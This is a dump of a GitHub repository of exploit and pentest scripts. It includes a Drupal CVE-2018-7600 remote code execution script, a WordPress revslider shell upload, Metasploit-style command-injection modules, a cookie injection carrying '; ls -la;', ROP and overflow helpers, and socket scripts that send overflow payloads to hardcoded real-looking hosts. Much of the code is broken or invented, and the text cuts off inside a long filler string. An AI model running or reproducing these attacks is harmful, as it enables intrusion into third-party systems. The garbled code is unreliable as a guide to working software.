├── CVE-2006-20001.py ├── CVE-2008-0005.html ├── CVE-2018-7600.pl ├── README.md ├── WordPress_RCE.php ├── adr_shell.sh ├── azure_tamper.py ├── binary_expl.py ├── blind_rop.sh ├── bof_fuzzer.py ├── brop ├── buff_build.py ├── buffer_layout.sh ├── buffer_len.py ├── buffer_scan ├── cgi_cmd_exec.rb ├── code_exec1.rb ├── code_exec2.rb ├── cookie_rce.pl ├── cve_1.py ├── drupal_exec.sh ├── drupal_rce.pl ├── execve_code.c ├── exploit_mod_session.c ├── fastcgi_rce.py ├── fs.sh ├── joomla_rce.pl ├── kitty_fuzz.py ├── mini_ecex.py ├── msrpc_fuzz.c ├── payload.txt ├── payloads_sample.txt ├── pwner.py ├── r2pipe.py ├── rce_proxy.py ├── rce_ssh.cpp ├── redirect_wp_shell.pl ├── ret.rs ├── ret2lib.sh ├── ret_pwn.py ├── return_sqli.pl ├── rop_exp.rs ├── ropchain.py ├── segfault_fuzzer.c ├── server_fuzz.rs ├── shell_exec.c ├── shell_scan.rs ├── smb_rce.py ├── ssh_exploit.c ├── strcpy_r2.py ├── syscall.sh ├── tamper_aws.py ├── tamper_payloads.txt ├── tamper_unix.py ├── trun_fuzzer.py ├── webdav_exec.pl ├── webfuzzer.rs ├── webmin_rce.pl └── zyxel_rce.py /CVE-2006-20001.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | target_host = "195.4.223.84" 4 | target_port = 80 5 | 6 | client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 7 | 8 | client.connect((target_host, target_port)) 9 | 10 | request = "GET / HTTP/1.1\r\nIf: \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r\n\r\n" 11 | -------------------------------------------------------------------------------- /CVE-2008-0005.html: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /CVE-2018-7600.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | use LWP::UserAgent; 4 | 5 | $ua = LWP::UserAgent->new; 6 | $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13"); 7 | 8 | $target = $ARGV[0]; 9 | $drupal_path = $ARGV[1]; 10 | 11 | if(!$target || !$drupal_path) { 12 | print "Usage: perl $0 \n"; 13 | print "Example: perl $0 www.example.com /drupal\n"; 14 | exit; 15 | } 16 | 17 | $exploit = $target . $drupal_path . "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"; 18 | 19 | $post_data = "form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=" . urlencode("echo \"VULNERABLE\" > /tmp/vulnerable.txt"); 20 | 21 | $response = $ua->post($exploit, Content_Type => 'application/x-www-form-urlencoded', Content => $post_data); 22 | if($response->is_success) { 23 | print "Exploit successful!\n"; 24 | print "Check /tmp/vulnerable.txt\n"; 25 | } 26 | else { 27 | print "Exploit failed.\n"; 28 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # exploits_scripts 2 | my mini collection of exploits and scripts for pentest 3 | -------------------------------------------------------------------------------- /WordPress_RCE.php: -------------------------------------------------------------------------------- 1 | 'revslider_ajax_action', 6 | 'client_action' => 'update_plugin', 7 | 'update_file' => "@shell.php" ); // The shell file we want to upload 8 | 9 | $ch = curl_init(); // Initialize a cURL session 10 | 11 | curl_setopt($ch, CURLOPT_URL,$url); // Set the target URL to send our request to 12 | curl_setopt($ch, CURLOPT_POST, 1); // Set the request type as POST (Default value) curl_setopt($ch, CURLOPT__POSTFIELDS,$data); // Set our data array as the POST data 13 | 14 | $result=curl_exec ($ch); // Execute the cURL session and store its response in a variable 15 | 16 | echo $result; // Print out the response from our cURL session which should be a success message if everything went alright! 17 | -------------------------------------------------------------------------------- /adr_shell.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | target_binary="$1" 4 | system_addr=$(objdump -d "$target_binary" | \ 5 | grep -E 'call.*' | \ 6 | head -1 | \ 7 | awk '{print $1}' | \ 8 | sed -e 's/^.*$//') 9 | shell_addr=$(objdump -s "$target_binary" | \ 10 | grep -E '/bin/sh' | \ 11 | awk '{print $3}') 12 | echo "System address: $system_addr" 13 | echo "Shell address: $shell_addr" 14 | -------------------------------------------------------------------------------- /azure_tamper.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import re 4 | 5 | def tamper(payload, **kwargs): 6 | payload = re.sub(r"(?<=\w)\s*=\s*", "=;", payload) 7 | return payload 8 | -------------------------------------------------------------------------------- /binary_expl.py: -------------------------------------------------------------------------------- 1 | import angr 2 | import pwntools 3 | 4 | proj = angr.Project('target_binary', auto_load_libs=False) 5 | state = proj.factory.blank_state(addr=proj.entry) 6 | sm = proj.factory.simgr(state) 7 | sm.explore(find=lambda s: b"\x90\x90\x90\x90" in s.posix.dumps(1)) 8 | return_addr = sm.found[0].posix.dumps(1)[-8:] 9 | shellcode = pwntools.shellcraft.amd64.linux.sh() 10 | payload = b"A" * (len(return_addr) - len(shellcode)) + shellcode 11 | exploit = pwntools.core.PwnlibContextType.shellcraft.pushstr(payload) 12 | p = proj.surveyors.ExploitSurveyor(find=[return_addr], use_bytes=True, shellcode=exploit) 13 | p.run() -------------------------------------------------------------------------------- /blind_rop.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Blind ROP Exploitation Script 4 | # Find buffer overflow offset 5 | target_binary="$1" 6 | echo "Finding buffer overflow offset..." 7 | python2 -c 'print "A"*offset' | $target_binary 8 | # Find canary 9 | echo "Finding canary..." 10 | python2 -c 'print "A"*offset + "\x00"*8' | $target_binary 11 | # Find saved registers (RBP / RIP) 12 | echo "Finding saved registers (RBP / RIP)..." 13 | python2 -c 'print "A"*offset + "\x00"*8 + "\x01\x02\x03\x04\x05\x06\x07\x08"' | $target_binary 14 | # Find stop gadgets 15 | echo "Finding stop gadgets..." 16 | ROPgadget --binary $target_binary --ropchain --badbytes 0 > gadgets.txt 17 | grep -E 'ret|pop|leave|retf' gadgets.txt > stop_gadgets.txt # grep for ret, pop, leave and retf instructions in the gadget list to find stop gadgets # save the results in a separate file for later use. 18 | # Find brop gadgets 19 | echo "Finding brop gadgets..." # search for ropchain instructions in the gadget list to find brop gadgets # save the results in a separate file for later use. 20 | ROPgadget --binary $target_binary --ropchain > brop_gadgets.txt 21 | # Find a Write function (write / dprintf / puts / ...) 22 | echo "Finding a Write function (write / dprintf / puts / ...)..." 23 | strings $target_binary| grep -E 'write|dprintf|puts' > write_functions.txt # search for write, dprintf and puts functions in the binary and save them to a file for later use. 24 | # Leak the binary for target binaryes and servers 25 | echo "Leaking the binary for target binaryes and servers..." 26 | nc 127.0.0.1 80 < <(cat $target_binary) 27 | -------------------------------------------------------------------------------- /bof_fuzzer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import pwntools pwn 3 | from pwn import * 4 | 5 | target_host = "example.com" 6 | target_port = 80 7 | 8 | conn = pwntools.remote(target_host, target_port) 9 | 10 | payload_size = 100 11 | 12 | while True: 13 | payload = 'A' * payload_size 14 | conn.send(payload) 15 | 16 | print("Sent %d bytes" % len(payload)) 17 | -------------------------------------------------------------------------------- /brop: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TcherB31/exploits_scripts/5fae4e405107b2bf8570368b80e09590d3d25cb0/brop -------------------------------------------------------------------------------- /buff_build.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import os 3 | 4 | # Get the target file 5 | target_file = sys.argv[1] 6 | 7 | # Create the exploit 8 | exploit = "" 9 | exploit += "#!/usr/bin/perl\n" 10 | exploit += "use strict;\n" 11 | exploit += "use warnings;\n" 12 | exploit += "\n" 13 | exploit += "# Exploit code goes here\n" 14 | exploit += "my $buffer = \"A\" x 1024;\n" 15 | exploit += "my $eip = \"\\x90\\x90\\x90\\x90\";\n" 16 | exploit += "my $shellcode = \"\\x90\" x 32;\n" 17 | exploit += "\n" 18 | exploit += "open(my $file, '>', $ARGV[0]) or die \"Could not open file '$ARGV[0]' $!\";\n" 19 | exploit += "print $file $buffer.$eip.$shellcode;\n" 20 | exploit += "close $file;\n" 21 | 22 | # Write the exploit to a file 23 | with open("exploit.pl") -------------------------------------------------------------------------------- /buffer_layout.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | PATH=/usr/bin:/usr/sbin:/bin:/sbin 4 | if [ $# -eq 0 ]; then 5 | echo "No target binary specified. Exiting..." 6 | exit 1 7 | fi 8 | target_binary="$1" 9 | if [ ! -f "$target_binary" ]; then 10 | echo "Target binary does not exist. Exiting..." 11 | exit 1 12 | fi 13 | 14 | readelf -l "$target_binary" > /tmp/readelf_program_headers.txt 15 | 16 | start_heap=$(cat /tmp/readelf_program_headers.txt | grep HEAP | awk '{print $2}') 17 | end_heap=$(cat /tmp/readelf_program_headers.txt | grep HEAP | awk '{print $3}') 18 | 19 | objdump -d "$target_binary" > /tmp/objdump_assembly.txt 20 | 21 | malloc_refs=$(cat /tmp/objdump_assembly.txt | grep -E 'malloc|calloc|realloc|free') 22 | echo "References to memory allocation functions:" 23 | echo "$malloc_refs" 24 | echo "" 25 | 26 | echo "Analyzing assembly code to determine how the heap is structured..." 27 | echo "" 28 | 29 | echo "Heap region starts at: $start_heap" 30 | echo "Heap region ends at: $end_heap" 31 | echo "" 32 | 33 | echo "Analyzing assembly code to determine how memory is allocated and freed in the heap..." 34 | echo "" 35 | 36 | echo "Identifying any memory management techniques that are used to manage the heap..." 37 | echo "" 38 | 39 | echo "Identifying any security measures that are used to protect the heap from malicious access..." 40 | echo "" 41 | 42 | echo "Analyzing assembly code to determine any potential vulnerabilities in the heap layout..." 43 | echo "" 44 | 45 | echo "Documenting findings and recommendations for improving the security of the heap layout..." 46 | echo "" -------------------------------------------------------------------------------- /buffer_len.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | target = sys.argv[1] 4 | 5 | for i in range(1, 256): 6 | try: 7 | buffer = "A" * i 8 | payload = buffer + target 9 | print("[+] Trying buffer length: %d" % i) 10 | response = subprocess.check_output(payload, shell=True) 11 | except: 12 | print("[+] Buffer length found: %d" % i) 13 | break 14 | -------------------------------------------------------------------------------- /buffer_scan: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TcherB31/exploits_scripts/5fae4e405107b2bf8570368b80e09590d3d25cb0/buffer_scan -------------------------------------------------------------------------------- /cgi_cmd_exec.rb: -------------------------------------------------------------------------------- 1 | # # 2 | # This module requires Metasploit: https: //metasploit.com/download 3 | # Current source: https: //github.com/rapid7/metasploit-framework 4 | # # 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Exploit::Remote 9 | Rank = ExcellentRanking 10 | include Msf::Exploit::Remote::HttpClient 11 | 12 | def initialize(info = {}) 13 | super(update_info(info, 14 | 'Name' => 'Ruby for Metasploit Framework Remote Code Execution Vulnerability in /cgi-bin/cmd.cgi', 15 | 'Description' => % q { This module exploits a remote code execution vulnerability in the /cgi-bin/cmd.cgi script on Ruby for Metasploit Framework systems 16 | }, 17 | 'Author' => ['TcherBer'], # an author or list of authors 'Payload' => {}, # payload info # target 's architecture that will receive the payload 18 | 'Platform' => ['unix', 'linux', ], # platform info(Unix, Linux, etc.) 19 | 'Targets' => [ 20 | ["Automatic", {}] 21 | ], # targets info(OS version, etc.) # an array of service versions that are vulnerable 22 | }, # an array of references to related security advisories], # a hash of verification information(e.g.file checksum)), # vulnerability disclosure date), # exploit publish date)) 23 | super(update_info(info, )) end def check vprint_status("Checking target") res = send_request_cgi({ 24 | "uri" => "/cgi-bin/cmd.cgi", 25 | }) if res && res.code == 200 && res.body = ~/Command Executor/ 26 | return Exploit::CheckCode::Vulnerable 27 | else return Exploit::CheckCode::Safe end end def exploit print_status("Sending payload...") send_request_raw({ 28 | "method" => "POST", 29 | "uri" => "/cgi-bin/cmd.cgi", 30 | "data" => payload 31 | }) end end 32 | -------------------------------------------------------------------------------- /code_exec1.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/ruby 2 | 3 | require 'msf/core' 4 | 5 | class MetasploitModule < Msf::Exploit::Remote 6 | 7 | Rank = ExcellentRanking 8 | 9 | include Msf::Exploit::Remote::HttpClient 10 | 11 | def initialize(info = {}) 12 | super(update_info(info, 13 | 'Name' => 'Bash Command Execution in Target URLs', 14 | 'Description' => % q { 15 | This module exploits a vulnerability in websites that contain vulnerable parameters and functions.It allows an attacker to execute arbitrary bash commands on the target system. 16 | }, 17 | 'License' => MSF_LICENSE, 18 | 'Author' => ['Your Name '], 19 | ['URL', 'http://example.com'] 20 | ], 21 | 'Space' => 1024, 22 | if true( 23 | default) 24 | }, 25 | 26 | 27 | 'Targets' => [ 28 | ["Automatic", {}] 29 | ], 30 | 31 | 32 | )) 33 | 34 | register_options([OptString.new('TARGETURI', [true, "The base path to the web application", "/"])]) 35 | 36 | deregister_options('VHOST') 37 | 38 | end 39 | 40 | def check 41 | for vulnerability goes here(e.g., version detection) 42 | 43 | end 44 | 45 | def exploit 46 | 47 | endend -------------------------------------------------------------------------------- /code_exec2.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin /ruby 2 | 3 | require 'msf/core' 4 | 5 | class MetasploitModule < Msf::Exploit::Remote 6 | include Msf::Exploit::Remote::HttpClient 7 | 8 | def initialize(info = {}) 9 | super(update_info(info, 10 | 'Name' => 'Command Injection Module', 11 | 'Description' => % q { 12 | This module exploits a Command injection vulnerability in websites that contain 13 | vulnerable parameters in the URL. 14 | }, 15 | 'Author' => ['Your Name'], 16 | 'License' => MSF_LICENSE, 17 | 'References' => [ 18 | ['URL', 'https://example.com/'], 19 | ], 20 | 'Privileged' => false, 21 | 'Platform' => ['unix', 'linux'], 22 | 'Arch' => [ARCH_X86, ARCH_X64], 23 | 'Payload' => { 24 | 'BadChars' => "\x00" 25 | }, 26 | 'Targets' => [ 27 | ['Generic (Unix In-Memory)', 28 | 'Platform' => 'unix', 29 | 'Arch' => ARCH_CMD, 30 | ], 31 | ], 32 | 'DefaultTarget' => 0 33 | )) 34 | 35 | register_options( 36 | [ 37 | OptString.new('TARGETURI', [true, 'The target URI of the vulnerable PHP application', '/path/to/target/param']), 38 | OptString.new('USER', [true, 'The username']) 39 | ], self.class) 40 | end 41 | 42 | def check 43 | res = nil 44 | req = send_request_cgi({ 45 | 'method' => 'GET', 46 | 'uri' => normalize_uri(target_uri.path) 47 | }) 48 | 49 | failure 50 | end 51 | 52 | def exploit 53 | command = "/bin/bash -c \"#{payload.encoded}\"" 54 | 55 | begin 56 | res = send_request_cgi({ 57 | 'method' => 'GET', 58 | 'uri' => normalize_uri(target_uri.path) + "?command=#{command}", 59 | 'vars_get' => { 60 | 'username' => datastore['USER'], 61 | } 62 | }) 63 | end 64 | 65 | if res and res.code == 200 and res.body.include ? ('Command executed successfully') 66 | print_status("Exploit successful") 67 | else 68 | fail_with(Failure::Unknown, "Exploit Failed") 69 | end 70 | end 71 | end -------------------------------------------------------------------------------- /cookie_rce.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | use LWP::UserAgent; 4 | my $url = "http://www.example.com/"; 5 | my $command = "; ls -la;"; 6 | my $ua = LWP::UserAgent->new; 7 | $ua->default_header('Cookie' => "command=$command"); 8 | my $response = $ua->get($url); 9 | print $response->content; 10 | -------------------------------------------------------------------------------- /cve_1.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | target_host = "ebmconsulting.com.hk" 4 | target_port = 80 5 | 6 | # Create a socket object 7 | client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 8 | 9 | # Connect to the target 10 | client.connect((target_host, target_port)) 11 | 12 | # Send malicious request 13 | evil_request = "GET / HTTP/1.1\r\nHost: ebmconsulting.com.hk\r\nCookie: SESSIONID=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA